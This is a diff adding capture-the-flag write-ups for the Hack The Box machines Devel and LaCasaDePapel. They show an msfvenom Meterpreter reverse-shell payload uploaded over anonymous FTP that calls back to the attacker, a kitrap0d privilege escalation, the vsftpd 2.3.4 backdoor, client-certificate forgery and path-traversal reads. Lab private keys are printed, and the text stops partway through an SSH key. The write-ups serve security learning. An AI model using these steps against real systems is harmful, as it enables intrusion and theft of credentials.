+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ **λ nihilist [~] → nmap -sC -sV 10.10.10.5**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 11:42 CET
+ Nmap scan report for 10.10.10.5
+ Host is up (0.039s latency).
+ Not shown: 998 filtered ports
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ | 03-18-17 01:06AM <****DIR> aspnet_client
+ | 03-17-17 04:37PM 689 iisstart.htm
+ |_03-17-17 04:37PM 184946 welcome.png
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 80/tcp open http Microsoft IIS httpd 7.5
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/7.5
+ |_http-title: IIS7
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds
+
+We see that port 21 is opened, and giving us a ftp service that allows anonymous connections to work with.
+
+## **Part 2 : Getting User Access**
+
+The first step is to check if we can download and upload files on the FTP service since it should allow us to be connected as an anonymous user.
+
+
+ **λ nihilist [~] → ftp 10.10.10.5**
+ Connected to 10.10.10.5.
+ 220 Microsoft FTP Service
+ Name (10.10.10.5:nihilist): anonymous
+ 331 Anonymous access allowed, send identity (e-mail name) as password.
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+
+ **ftp> dir**
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 03-18-17 01:06AM **IR> aspnet_client
+ 03-17-17 04:37PM 689 iisstart.htm
+ 03-17-17 04:37PM 184946 welcome.png
+ 226 Transfer complete.
+
+
+Now let's see if we can download files and upload files.
+
+
+ **ftp> dir**
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 03-18-17 01:06AM **R> aspnet_client
+ 03-17-17 04:37PM 689 iisstart.htm
+ 03-17-17 04:37PM 184946 welcome.png
+ 226 Transfer complete.
+
+ **ftp> get welcome.png**
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 820 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 184946 bytes received in 0.285 seconds (634 kbytes/s)
+
+ **ftp> put nihilist.html**
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 226 Transfer complete.
+ 16 bytes sent in 0.000144 seconds (109 kbytes/s)
+
+
+We have been able to download welcome.png, and upload nihilist.html, let's see if we can browse to our uploaded webpage.
+
+
+
+As shown above, we have successfully uploaded our webpage, and browsed to it. now let's try to upload a reverse shell and browse to it. To generate the payload named nihilist.aspx, we will be using msfvenom with the -p, LHOST, LPORT and -f flags. We will be using our terminal with the according metasploit module to recieve the meterpreter connection.
+
+_Terminal n°1:_
+
+
+ **λ nihilist [~/_HTB/Devel] → msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=9001 -f aspx > nihilist.aspx**
+ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+ [-] No arch selected, selecting arch: x86 from the payload
+ No encoder or badchars specified, outputting raw payload
+ Payload size: 341 bytes
+ Final size of aspx file: 2824 bytes
+
+ **λ nihilist [~/_HTB/Devel] → msfconsole**
+
+ **msf5 > use exploit/multi/handler**
+
+ **msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp**
+ payload => windows/meterpreter/reverse_tcp
+
+ **msf5 exploit(multi/handler) > set LHOST 10.10.14.48**
+ LHOST => 10.10.14.48
+
+ **msf5 exploit(multi/handler) > set LPORT 9001**
+ LPORT => 9001
+
+ **msf5 exploit(multi/handler) > show options**
+
+ Module options (exploit/multi/handler):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+
+
+ Payload options (windows/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
+ LHOST 10.10.14.48 yes The listen address (an interface may be specified)
+ LPORT 9001 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Wildcard Target
+
+
+
+our first terminal is ready to recieve the connection, now we will upload the nihilist.aspx payload, and browse to it, and we'll see if we can get our meterpreter shell.
+
+_Terminal n°2:_
+
+
+ **λ nihilist [~/_HTB/Devel] → ftp 10.10.10.5**
+
+ Connected to 10.10.10.5.
+ 220 Microsoft FTP Service
+ Name (10.10.10.5:nihilist): anonymous
+ 331 Anonymous access allowed, send identity (e-mail name) as password.
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+
+ **ftp> put nihilist.aspx**
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 226 Transfer complete.
+ 2860 bytes sent in 0.000315 seconds (8.66 Mbytes/s)
+ ftp>
+
+
+
+ _Terminal n°1:_
+
+
+ **msf5 exploit(multi/handler) > exploit**
+
+ [*] Started reverse TCP handler on 10.10.14.48:9001
+ [*] Sending stage (180291 bytes) to 10.10.10.5
+ [*] Meterpreter session 1 opened (10.10.14.48:9001 -> 10.10.10.5:49158) at 2019-11-10 13:55:18 +0100
+
+ **meterpreter > getuid**
+ Server username: IIS APPPOOL\Web
+
+ **meterpreter > background**
+ [*] Backgrounding session 1...
+
+
+
+We recieved our meterpreter session back, now we need to escalate privileges. First of all we background our meterpreter session, so that we can use the ms10_015 exploit named kitrap0d
+
+
+ **meterpreter > background**
+ [*] Backgrounding session 1...
+ **msf5 exploit(multi/handler) >**
+
+ **msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d**
+
+ **msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1**
+ session => 1
+
+ **msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.48**
+ lhost => 10.10.14.48
+
+ **msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 9002**
+ lport => 9002
+
+ **msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit**
+
+ [*] Started reverse TCP handler on 192.168.0.23:9002
+ [*] Launching notepad to host the exploit...
+ [+] Process 3372 launched.
+ [*] Reflectively injecting the exploit DLL into 3372...
+ [*] Injecting exploit into 3372 ...
+ [*] Exploit injected. Injecting payload into 3372...
+ [*] Payload injected. Executing exploit...
+ [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+ [*] Sending stage (179779 bytes) to 10.10.10.5
+ [*] Meterpreter session 2 opened (10.10.14.48:9002 -> 10.10.10.5:49159) at 2019-11-10 14:04:56 -0500
+
+ **meterpreter > getuid**
+ Server username: NT AUTHORITY\SYSTEM
+
+
+Our exploit worked! It returned with an elevated privileges shell. Now all that is left to do is grabbing the user and root flags.
+
+## **Part 3 : The Root Access**
+
+The user flag is located in C:\User\babis\Desktop The root flag is located in C:\Users\Administrator\Desktop
+
+
+ c:\Users\babis\Desktop>type user.txt
+ type user.txt
+ **XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+
+ c:\Users\Administrator\Desktop>type root.txt
+ type root.txt
+ **XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+
+
+And that's it ! we grabbed both the user and root flags.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/30.md b/Easy/30.md
new file mode 100644
index 0000000..4b21324
--- /dev/null
+++ b/Easy/30.md
@@ -0,0 +1,528 @@
+# LaCasaDePapel Writeup
+
+
+
+## Introduction :
+
+LaCasaDePapel is an easy Linux box released back in March 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
+ → ping 10.10.10.131
+ PING 10.10.10.131 (10.10.10.131) 56(84) bytes of data.
+ 64 bytes from 10.10.10.131: icmp_seq=1 ttl=63 time=37.7 ms
+ 64 bytes from 10.10.10.131: icmp_seq=2 ttl=63 time=140 ms
+ 64 bytes from 10.10.10.131: icmp_seq=3 ttl=63 time=248 ms
+ ^C
+ --- 10.10.10.131 ping statistics ---
+ 3 packets transmitted, 3 received, 0% packet loss, time 2003ms
+ rtt min/avg/max/mdev = 37.737/141.928/247.866/85.793 ms
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
+ → nmap -F 10.10.10.131
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 10:36 CET
+ Nmap scan report for 10.10.10.131
+ Host is up (0.34s latency).
+ Not shown: 96 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 80/tcp open http
+ 443/tcp open https
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.37 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Netmon ]
+ → nmap -sCV -p21,22,80,443 10.10.10.131
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 10:36 CET
+ Nmap scan report for 10.10.10.131
+ Host is up (0.19s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 2.3.4
+ 22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
+ | 256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
+ |_ 256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
+ 80/tcp open http Node.js (Express middleware)
+ |_http-title: La Casa De Papel
+ 443/tcp open ssl/http Node.js Express framework
+ | http-auth:
+ | HTTP/1.1 401 Unauthorized\x0D
+ |_ Server returned status 401 but no WWW-Authenticate header.
+ | ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
+ | Not valid before: 2019-01-27T08:35:30
+ |_Not valid after: 2029-01-24T08:35:30
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+ | tls-nextprotoneg:
+ | http/1.1
+ |_ http/1.0
+ Service Info: OS: Unix
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 30.73 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up vsftpd 2.3.4 running on port 21, Let's run a quick searchsploit command to see if there are any popular exploits for us to use.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → searchsploit vsftpd 2.3
+ ---------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ---------------- ----------------------------------------
+ vsftpd 2.3.2 - | exploits/linux/dos/16270.c
+ vsftpd 2.3.4 - | exploits/unix/remote/17491.rb
+ ---------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+
+Seems like there is a .rb script for us to use, which is most probably available for us within metasploit. Let's fire up msfconsole to see if we're correct.
+
+
+ msf5 > search vsftpd 2.3.4
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
+ 1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
+ 2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
+ 3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
+
+
+
+The third one seems to be interesting , let's use it.
+
+
+ msf5 > use 3
+ msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
+
+ Module options (exploit/unix/ftp/vsftpd_234_backdoor):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 21 yes The target port (TCP)
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+
+ msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.131
+ RHOSTS => 10.10.10.131
+ msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
+
+
+The only option that needs to be set is the RHOSTS one, we then hit exploit and see what results we're getting :
+
+
+ msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
+
+ [*] 10.10.10.131:21 - Banner: 220 (vsFTPd 2.3.4)
+ [*] 10.10.10.131:21 - USER: 331 Please specify the password.
+ [*] Exploit completed, but no session was created.
+
+
+
+The exploit doesn't seem to work, Let's locate it, then copy it onto our local directory to examine it a little closer.
+
+
+ msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exit
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → mkdir CasaDePapel
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → cd CasaDePapel
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
+ → locate 17491
+ /opt/metasploit/vendor/bundle/ruby/2.6.0/gems/metasploit-credential-3.0.3/db/migrate/20140722174919_old_creds_to_new_creds.rb
+ /usr/share/exploitdb/exploits/unix/remote/17491.rb
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
+ → cp /usr/share/exploitdb/exploits/unix/remote/17491.rb .
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
+ → nano 17491.rb
+
+
+Looking at the code, we see that the exploit tries to connect to the 6200th port. Let's use telnet to see if we can connect to it manually.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
+ → telnet 10.10.10.131 6200
+ Trying 10.10.10.131...
+ Connected to 10.10.10.131.
+ Escape character is '^]'.
+ Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman
+ ls
+ Variables: $tokyo
+ ls
+ Variables: $tokyo
+ whoami
+ PHP Warning: Use of undefined constant whoami - assumed 'whoami' (this will throw an Error in a future version of PHP) in phar://eval()'d code on line 1
+ help
+ help Show a list of commands. Type `help [foo]` for information about [foo]. Aliases: ?
+ ls List local, instance or class variables, methods and constants. Aliases: list, dir
+ dump Dump an object or primitive.
+ doc Read the documentation for an object, class, constant, method or property. Aliases: rtfm, man
+ show Show the code for an object, class, constant, method or property.
+ wtf Show the backtrace of the most recent exception. Aliases: last-exception, wtf?
+ whereami Show where you are in the code.
+ throw-up Throw an exception or error out of the Psy Shell.
+ timeit Profiles with a timer.
+ trace Show the current call stack.
+ buffer Show (or clear) the contents of the code input buffer. Aliases: buf
+ clear Clear the Psy Shell screen.
+ edit Open an external editor. Afterwards, get produced code in input buffer.
+ sudo Evaluate PHP code, bypassing visibility restrictions.
+ history Show the Psy Shell history. Aliases: hist
+ exit End the current session and return to caller. Aliases: quit, q
+ whereami
+
+ From phar:///usr/bin/psysh/src/functions.php:307:
+
+ 302| $config['colorMode'] = Configuration::COLOR_MODE_FORCED;
+ 303| } elseif ($input->getOption('no-color')) {
+ 304| $config['colorMode'] = Configuration::COLOR_MODE_DISABLED;
+ 305| }
+ 306|
+ > 307| $shell = new Shell(new Configuration($config));
+ 308|
+ 309|
+ 310| if ($usageException !== null || $input->getOption('help')) {
+ 311| if ($usageException !== null) {
+ 312| echo $usageException->getMessage() . PHP_EOL . PHP_EOL;
+
+ history
+ show $tokyo
+ > 2| class Tokyo {
+ 3| private function sign($caCert,$userCsr) {
+ 4| $caKey = file_get_contents('/home/nairobi/ca.key');
+ 5| $userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
+ 6| openssl_x509_export($userCert, $userCertOut);
+ 7| return $userCertOut;
+ 8| }
+ 9| }
+
+
+
+
+Interestingly enough, the 4th line seems to pass the contents of a file named ca.key into the $caKey variable. Let's see what the contents of the ca.key are ourselves.
+
+
+ file_get_contents('/home/nairobi/ca.key');
+ => """
+ -----BEGIN PRIVATE KEY-----\n
+ MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb\n
+ 7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/\n
+ 2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl\n
+ uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M\n
+ YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp\n
+ s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us\n
+ PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V\n
+ Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89\n
+ 1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ\n
+ /CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+\n
+ q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr\n
+ uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd\n
+ I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og\n
+ 7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE\n
+ G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn\n
+ sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH\n
+ CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y\n
+ sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI\n
+ ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2\n
+ zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/\n
+ ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC\n
+ 9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M\n
+ WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM\n
+ 7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR\n
+ aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc\n
+ 53udBEzjt3WPqYGkkDknVhjD\n
+ -----END PRIVATE KEY-----\n
+ """
+
+
+
+Seems like we have a private SSL key to work with ! let's save it locally as ca.key. Do not forget to remove the \n and the spaces at the beginning of the lines otherwise it won't be the exact same SSH key. Earlier on, our nmap scan picked up the 443rd port open running https, let's browse to it and see what we can work with.
+
+
+
+Seems like we need to provide a certificate. So let's first add the casadepapel.htb hostname to our /etc/hosts file.
+
+
+ 127.0.0.1 localhost
+ 127.0.1.1 Prometheus
+ 10.10.10.131 casadepapel.htb
+
+
+navigating over to https://10.10.10.131/ > connection > more information > security > view certificate > details > export and now we have the ca.key and ca.crt
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl pkey -in ca.key -pubout
+ -----BEGIN PUBLIC KEY-----
+ MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
+ 5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
+ 8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
+ hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
+ mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
+ D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
+ ZwIDAQAB
+ -----END PUBLIC KEY-----
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl x509 -in ca.crt -pubkey -noout
+ -----BEGIN PUBLIC KEY-----
+ MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
+ 5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
+ 8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
+ hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
+ mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
+ D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
+ ZwIDAQAB
+ -----END PUBLIC KEY-----
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl x509 -in ca.crt -pubkey -noout | grep md5sum
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl x509 -in ca.crt -pubkey -noout | md5sum
+ 71e2b2ca7b610c24d132e3e4c06daf0c -
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl pkey -in ca.key -pubout | md5sum
+ 71e2b2ca7b610c24d132e3e4c06daf0c -
+
+
+
+so here we see that the md5 hashes of both the public keys are the same, therefore it means that the public key is valid. From there, we need to generate a 4096 bit key and create a certificate signing request that we'll name client.csr
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl genrsa -out client.key 4096
+ Generating RSA private key, 4096 bit long modulus (2 primes)
+ ......................................................................++++
+ .............................................++++
+ e is 65537 (0x010001)
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → ls
+ ca.crt ca.key client.key
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl req -new -key client.key -out client.csr
+ You are about to be asked to enter information that will be incorporated
+ into your certificate request.
+ What you are about to enter is what is called a Distinguished Name or a DN.
+ There are quite a few fields but you can leave some blank
+ For some fields there will be a default value,
+ If you enter '.', the field will be left blank.
+ -----
+ Country Name (2 letter code) [AU]:US
+ State or Province Name (full name) [Some-State]:NY
+ Locality Name (eg, city) []:NYC
+ Organization Name (eg, company) [Internet Widgits Pty Ltd]:Marvel
+ Organizational Unit Name (eg, section) []:DC
+ Common Name (e.g. server FQDN or YOUR name) []:nihilist
+ Email Address []:nihilist@prometheus.com
+
+ Please enter the following 'extra' attributes
+ to be sent with your certificate request
+ A challenge password []:
+ An optional company name []:
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → ls
+ ca.crt ca.key client.csr client.key
+
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → ls
+ ca.crt ca.key client.csr client.key
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl x509 -req -in client.csr -CA ca.crt -CAkey ca.key -set_serial 9001 -extensions client -days 365 -outform PEM -out client.cer
+ Signature ok
+ subject=C = US, ST = NY, L = NYC, O = Marvel, OU = DC, CN = nihilist, emailAddress = nihilist@prometheus.com
+ Getting CA Private Key
+
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
+ Enter Export Password:
+ Verifying - Enter Export Password:
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → ls
+ ca.crt ca.key client.cer client.csr client.key client.p12
+
+
+    
+
+And we are in ! now we are able to enumerate the box further, from here we see that clicking on season1 then shows us a bunch of avi files to download, hovering over them, we see that their hyperlink is base64 encoded, and barely changing, so let's try getting some LFI.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → curl -sk https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E\=
+ -----BEGIN OPENSSH PRIVATE KEY-----
+ b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn
+ NhAAAAAwEAAQAAAgEAotH6Ygupi7JhjdbDXhg2f9xmzxaDNdxxEioAgH2GjUeUc4cJeTfU
+ /yWg1vyx1dXqanfwAzYOQLUgO9/rDbI9y51rTQnLhHsp/iFiGdvDO5iZwLNrwmzVLxgGc+
+ mNac3qxHcuHx7q+zQHB8NfU/qzyAL2/xsRkzBODRg21tsVqnTV83T8CFSBUO2jzitHFNjv
+ YbacP+Jn9Q5Y2HRdE03DWnAJJ7zk4SWWicM3riuuYyeqV6OYKboHwi+FB94Yx1xaPFGP7T
+ 0jnBU3molURhKKolNqY78PE5qYplO/eO5H/7vKbrF7J5VtsVpvGQsmjqUhQK/GoYrMudIh
+ cfQSMUnpgWXYtCnIpBa53aY/fl0XYpL9a1ZQh1iGm4oleVnZNvqMa4mb+8kC8k3WDmw9pq
+ /W3eGVQ6Xeyj/4kUENe1Q8xj9BIXLZJwXYHtACLS4PaKZSRaFSjkc/26/T2958f2oBqJLf
+ +oxiydgcTI2vC34OYwwS7cOcSsS4HivUC6K7oJJHw3nUNoA2ge3cwiO6bNHrEKMJWOrMpp
+ 9UH9BbQ/u7k5Ap7QF8yBfrdC64EAUzyZJXWde1NhSNjiI0rBqzCPZQGSOLEIFAwzU0bMIu
+ Ju4JIQOAH+3tfoh8ccUdNcmfH7LaT7pF3VYwyoPMowLpA8fG4FXGyvoyrfeTXC6GY0+1NV
+ UAAAdQRqG3BkahtwYAAAAHc3NoLXJzYQAAAgEAotH6Ygupi7JhjdbDXhg2f9xmzxaDNdxx
+ EioAgH2GjUeUc4cJeTfU/yWg1vyx1dXqanfwAzYOQLUgO9/rDbI9y51rTQnLhHsp/iFiGd
+ vDO5iZwLNrwmzVLxgGc+mNac3qxHcuHx7q+zQHB8NfU/qzyAL2/xsRkzBODRg21tsVqnTV
+ 83T8CFSBUO2jzitHFNjvYbacP+Jn9Q5Y2HRdE03DWnAJJ7zk4SWWicM3riuuYyeqV6OYKb
+ oHwi+FB94Yx1xaPFGP7T0jnBU3molURhKKolNqY78PE5qYplO/eO5H/7vKbrF7J5VtsVpv
+ GQsmjqUhQK/GoYrMudIhcfQSMUnpgWXYtCnIpBa53aY/fl0XYpL9a1ZQh1iGm4oleVnZNv
+ qMa4mb+8kC8k3WDmw9pq/W3eGVQ6Xeyj/4kUENe1Q8xj9BIXLZJwXYHtACLS4PaKZSRaFS
+ jkc/26/T2958f2oBqJLf+oxiydgcTI2vC34OYwwS7cOcSsS4HivUC6K7oJJHw3nUNoA2ge
+ 3cwiO6bNHrEKMJWOrMpp9UH9BbQ/u7k5Ap7QF8yBfrdC64EAUzyZJXWde1NhSNjiI0rBqz
+ CPZQGSOLEIFAwzU0bMIuJu4JIQOAH+3tfoh8ccUdNcmfH7LaT7pF3VYwyoPMowLpA8fG4F
+ XGyvoyrfeTXC6GY0+1NVUAAAADAQABAAACAAx3e25qai7yF5oeqZLY08NygsS0epNzL40u
+ fh9YfSbwJiO6YTVQ2xQ2M1yCuLMgz/Qa/tugFfNKaw9qk7rWvPiMMx0Q9O5N5+c3cyV7uD
+ Ul+A/TLRsT7jbO5h+V8Gf7hlBIt9VWLrPRRgCIKxJpDb7wyyy5S90zQ6apBfnpiH0muQMN
+ IAcbQVOK/pHYqnakLaATtV8G3OLcmFzqe/3wZFbWYT0Tr4q1sBMYSXkiixW4gch4FDyNq+
+ 5oaQ0zKj6Jibc4n4aQudtHnJxOi49Z+Bd5v5mnlWXw3mNN4klGJWklXdif6kgbnuyHeh42
+ xlsBtcwYKWNRF1/bAQiSoZn4iNJqSFYcx9SzE+QadUfhtkbBiBC7HPHhANgmcg4FBJsz3f
+ S4vJWkQvRd/wGjW+B6ywn6qrsJ1hSaoR9Tr7pwKfTKL1HyvMCWd5DEt98EWyyQUdHfKYgp
+ E4oo6g2LX9c6bLawGvzFkVcfiH8XM0lyRpKV2hAU03KzNbbmy73HsxMBbVp0SMk62phRWw
